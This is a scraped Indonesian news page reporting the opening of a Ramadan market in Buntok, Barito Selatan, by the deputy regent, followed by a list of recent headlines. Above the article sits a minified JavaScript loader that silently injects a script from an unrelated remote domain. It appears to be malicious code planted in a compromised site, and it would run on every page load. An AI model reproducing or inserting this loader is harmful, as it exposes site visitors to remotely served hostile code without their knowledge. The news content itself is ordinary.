(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Wakil Bupati Barsel Buka Pasar Ramadhan 1440 H


BUNTOK, Wakil Bupati Barito Selatan (Barsel) Satya Titiek Atyani Djoedir, membuka pasar Ramadhan 1440 Hijriyah di Plaza Beringin Buntok, Senin (6/5). Perempuan akrab disapa Aty Djoedir itu mengatakan, pasar ramadhan merupakan agenda rutin Pemkab Barsel untuk memfasilitasi para pedagang kue dan makanan untuk memenuhi keperluan masyarakat yang ingin mencari menu berbuka puasa.

“Karena pasar Ramadhan ini merupakan tempat menjual berbagai penganan dan minuman untuk berbuka puasa,” kata Aty Djoedir kepada Kanalkalimantan.com, usai pembukaan.

Ia juga mengharapkan kepada masyarakat dapat memanfaatkannya dengan sebaik-baiknya, karena makanan dan minuman yang dijual di pasar ini jarang ditemui di luar bulan Ramadhan. “Jadi manfaatkan momen ini karena hanya ada sekali setahun,” ucapnya.

Di tempat yang sama Kepala Disdagkop dan UKM Barsel Swita Minarsih mengatakan, kegiatan ini bertujuan untuk memberikan kesempatan kepada para pedagang untuk menjual berbagai kuliner yang mereka miliki.

“Kita menyediakan sebanyak 30 lapak bagi para pedagang untuk berjualan di tempat yang telah kita sediakan,” ujar Swita usai acara.

Ia juga mengatakan, selain pasar ramadhan pihaknya juga akan menggelar pasar penyeimbang untuk masyarakat barsel yang digelar seminggu sebelum lebaran yang dilaksanakan mulai 21-23 Mei. “Cuma untuk para pembeli akan dibatasi, sehingga tidak ada kesempatan untuk menyetok barang, mengingat tujuan pasar penyeimbang ini untuk membantu masyarakat yang kurang mampu,” tegas Swita.

Pantauan Kanalkalimantan.com, setelah dibuka secara resmi oleh Wakil Bupati Barsel, pasar ramadhan itu langsung dipadati oleh ratusan warga untuk membeli kue dan masakan untuk berbuka puasa. “Ini sudah menjadi kebiasaan kami setiap sore untuk mengunjungi pasar Ramadhan. Karena disini cukup lengkap menjual berbagai kue dan masakan untuk berbuka puasa,” kata salah seorang pengunjung, Ufik Fauzan.(digdo)

Reporter:Digdo
Editor:Cell

Desy Arfianty

Recent Posts

Kasus Pencabutan SHM Transmigran Sepihak di Kotabaru, Kementrans Kirim Tim Investigasi

KANALKALIMANTAN.COM, JAKARTA - Kementerian Transmigrasi (Kementrans) turun tangan langsung menangani kasus pencabutan Sertipikat Hak Milik… Read More

4 jam ago

Tempat Hiburan di Banjarbaru Wajib Tutup Selama Ramadan

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota Banjarbaru mengeluarkan surat edaran tentang pelaksanaan kegiatan masyarakat pada bulan… Read More

5 jam ago

Waspada Hujan Disertai Petir dan Gelombang Tinggi di Kalsel

KANALKALIMANTAN.COM, BANJARBARU – Cuaca di Kalimantan Selatan (Kalsel) dalam sepekan ke depan diprakirakan masih didominasi… Read More

7 jam ago

BPBD Balangan Gelar Pelatihan TRC PB Tahap II di Batakan

KANALKALIMANTAN.COM, PARINGIN - Badan Penanggulangan Bencana Daerah (BPBD) Kabupaten Balangan menuntaskan tahap II pelatihan Tim… Read More

8 jam ago

1 Ramadan Resmi Jatuh Kamis 19 Februari

KANALKALIMANTAN.COM, JAKARTA — Kementerian Agama Republik Indonesia (Kemenag RI) resmi menetapkan 1 Ramadan 1447 Hijriah… Read More

20 jam ago

Hilal di Kalsel Tidak Terlihat, 1 Ramadan Menunggu Keputusan Pusat

KANALKALIMANTAN.COM, BANJARMASIN — Kantor Wilayah (Kanwil) Kementerian Agama Provinsi Kalimantan Selatan (Kemenag Kalsel) menggelar pemantauan… Read More

22 jam ago

This website uses cookies.